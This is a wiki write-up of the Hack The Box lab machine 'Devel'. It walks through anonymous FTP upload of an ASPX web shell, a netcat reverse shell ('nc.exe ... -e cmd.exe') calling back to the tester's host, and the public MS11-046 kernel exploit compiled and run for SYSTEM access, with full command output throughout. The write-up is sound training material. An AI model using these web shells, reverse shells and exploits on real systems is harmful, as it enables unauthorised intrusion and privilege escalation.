Devel

From Luniwiki
Jump to: navigation, search

Back

Devel01.png

Ports scan

root@kali:~/HTB/Machines/Devel# nmap -A -T4 -v -oN nmap.txt devel
# Nmap 7.80 scan initiated Thu Nov 14 08:47:20 2019 as: nmap -A -T4 -v -oN nmap.txt devel
Nmap scan report for devel (10.10.10.5)
Host is up (0.044s latency).
rDNS record for 10.10.10.5: devel.htb
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.378 days (since Wed Nov 13 23:43:29 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 44.49 ms 10.10.14.1 2 44.63 ms devel.htb (10.10.10.5)
Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Nov 14 08:47:38 2019 -- 1 IP address (1 host up) scanned in 18.12 seconds

Ftp & web server

The web server seems to be the startup page of IIS.

Devel02.png

We push a file to the ftp server.

root@kali:~/HTB/Machines/Devel# cat hello.html
<html>Hello I am in</html>
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put hello.html
local: hello.html remote: hello.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
28 bytes sent in 0.00 secs (379.7743 kB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
11-18-19  12:03AM                   28 hello.html
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> quit
221 Goodbye.

And we check we see it on the web server.

Devel03.png

Push a webshell

root@kali:~/HTB/Machines/Devel# cp /usr/share/webshells/aspx/cmdasp.aspx ./
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (11.0903 MB/s)
ftp> quit
221 Goodbye.

We can execute commands from the web shell.

Devel04.png

Full reverse shell

Download nc for windows

root@kali:~/HTB/Machines/Devel# wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
--2019-11-14 11:31:01--  https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
Resolving eternallybored.org (eternallybored.org)... 84.255.206.8, 2a01:260:4094:1:42:42:42:42
Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 111892 (109K) [application/zip]
Saving to: ‘netcat-win32-1.12.zip’
netcat-win32-1.12.z 100%[==================>] 109.27K   241KB/s    in 0.5s 
2019-11-14 11:31:02 (241 KB/s) - ‘netcat-win32-1.12.zip’ saved [111892/111892]

Unzip the file

root@kali:~/HTB/Machines/Devel# unzip -d netcat netcat-win32-1.12.zip
Archive:  netcat-win32-1.12.zip
 inflating: netcat/doexec.c
 inflating: netcat/getopt.c
 inflating: netcat/netcat.c
 inflating: netcat/generic.h
 inflating: netcat/getopt.h
 inflating: netcat/hobbit.txt
 inflating: netcat/license.txt
 inflating: netcat/readme.txt
 inflating: netcat/Makefile
 inflating: netcat/nc.exe
 inflating: netcat/nc64.exe
root@kali:~/HTB/Machines/Devel# cp netcat/nc.exe ./

Push nc to the server

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put nc.exe
local: nc.exe remote: nc.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
65573 bytes sent in 0.09 secs (715.1759 kB/s)
ftp> bye
221 Goodbye.

Run listener

root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

Initiate the reverse shell

Launch the following command from the webshell.

c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe

Devel05.png

But it does not work, IIS is complaining "This program cannot be run in DOS mode"

The problem was the file was transferred in text mode instead of binary.

second transfer of nc.exe

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put nc.exe
local: nc.exe remote: nc.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
38616 bytes sent in 0.00 secs (200.1472 MB/s)
ftp> bye
221 Goodbye.

Initiate the reverse shell

Launch the following command from the webshell.

c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe

Devel08.png

This time it works!

root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49167.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Reverse shell with Insmoniashell

I used this reverse shell, because I didn't know that the issue was the transfer mode of nc.exe.

Download Insomniashell

root@kali:~/HTB/Machines/Devel# wget https://www.darknet.org.uk/content/files/InsomniaShell.zip
--2019-11-14 13:32:23--  https://www.darknet.org.uk/content/files/InsomniaShell.zip
Resolving www.darknet.org.uk (www.darknet.org.uk)... 45.79.65.87
Connecting to www.darknet.org.uk (www.darknet.org.uk)|45.79.65.87|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8902 (8.7K) [application/zip]
Saving to: ‘InsomniaShell.zip’
InsomniaShell.zip   100%[==================>]   8.69K  --.-KB/s    in 0s 
2019-11-14 13:32:23 (58.5 MB/s) - ‘InsomniaShell.zip’ saved [8902/8902]

Push Insomniashell to the server

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put InsomniaShell/InsomniaShell.aspx InsomniaShell.aspx
local: InsomniaShell/InsomniaShell.aspx remote: InsomniaShell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
45580 bytes sent in 0.09 secs (504.3878 kB/s)
ftp> bye
221 Goodbye.

Run the reverse shell

Devel06.png

On the listening console, the reverse shell is opened.

root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49160.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>

Privilege escalation

Windows 7 (6.1.7600 N/A Build 7600) without patch is vulnerable to MS11-046.

root@kali:~# searchsploit MS11-046
-------------------------------------- ----------------------------------------
 Exploit Title                        |  Path
                                      | (/usr/share/exploitdb/)
-------------------------------------- ----------------------------------------
Microsoft Windows (x86) - 'afd.sys' L | exploits/windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local K | exploits/windows/dos/18755.c
-------------------------------------- ----------------------------------------
Shellcodes: No Result
------------------------------- -----------------------------------------------
 Paper Title                   |  Path
                               | (/usr/share/exploitdb-papers/)
------------------------------- -----------------------------------------------
MS11-046 - Dissecting a 0day   | docs/english/18712-ms11-046---dissecting-a-0da
------------------------------- -----------------------------------------------

compile the exploit

root@kali:~/HTB/Machines/Devel# cp /usr/share/exploitdb/exploits/windows_x86/local/40564.c ./
root@kali:~/HTB/Machines/Devel# i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

upload the exploit to the server

root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put MS11-046.exe
local: MS11-046.exe remote: MS11-046.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
345251 bytes sent in 0.48 secs (709.0281 kB/s)
ftp> bye
221 Goodbye.

run the exploit

From the reverse shell

Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49163.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>cd c:\inetpub\wwwroot
cd c:\inetpub\wwwroot
c:\inetpub\wwwroot>MS11-046.exe
MS11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system

User flag

c:\Windows\System32>cd ..
cd ..
c:\Windows>cd ..
cd ..
c:\>cd Users
cd Users
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users
18/03/2017  01:16 ▒▒    <DIR>          .
18/03/2017  01:16 ▒▒    <DIR>          ..
18/03/2017  01:16 ▒▒    <DIR>          Administrator
17/03/2017  04:17 ▒▒    <DIR>          babis
18/03/2017  01:06 ▒▒    <DIR>          Classic .NET AppPool
18/11/2019  05:20 ▒▒    <DIR>          Public
              0 File(s)              0 bytes
              6 Dir(s)  24.569.319.424 bytes free
c:\Users>cd babis
cd babis
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
<USER FLAG>

Root Flag

c:\Users\babis\Desktop>cd ..
cd ..
c:\Users\babis>cd ..
cd ..
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
<ROOT FLAG>
c:\Users\Administrator\Desktop>exit
exit
[*] MS11-046 (CVE-2011-1249) x86 exploit
  [*] by Tomislav Paskalev
[*] Identifying OS
  [+] 32-bit
  [+] Windows 7
[*] Locating required OS components
  [+] ntkrnlpa.exe
     [*] Address:      0x8284c000
     [*] Offset:       0x007c0000
     [+] HalDispatchTable
        [*] Offset:    0x008e93b8
  [+] NtQueryIntervalProfile
     [*] Address:      0x77865510
  [+] ZwDeviceIoControlFile
     [*] Address:      0x77864ca0
[*] Setting up exploitation prerequisite
  [*] Initialising Winsock DLL
     [+] Done
     [*] Creating socket
        [+] Done
        [*] Connecting to closed port
           [+] Done
[*] Creating token stealing shellcode
  [*] Shellcode assembled
  [*] Allocating memory
     [+] Address:      0x02070000
     [*] Shellcode copied
[*] Exploiting vulnerability
  [*] Sending AFD socket connect request
     [+] Done
     [*] Elevating privileges to SYSTEM
        [+] Done
        [*] Spawning shell
[*] Exiting SYSTEM shell

References

Daniel Simao 08:52, 14 November 2019 (EST)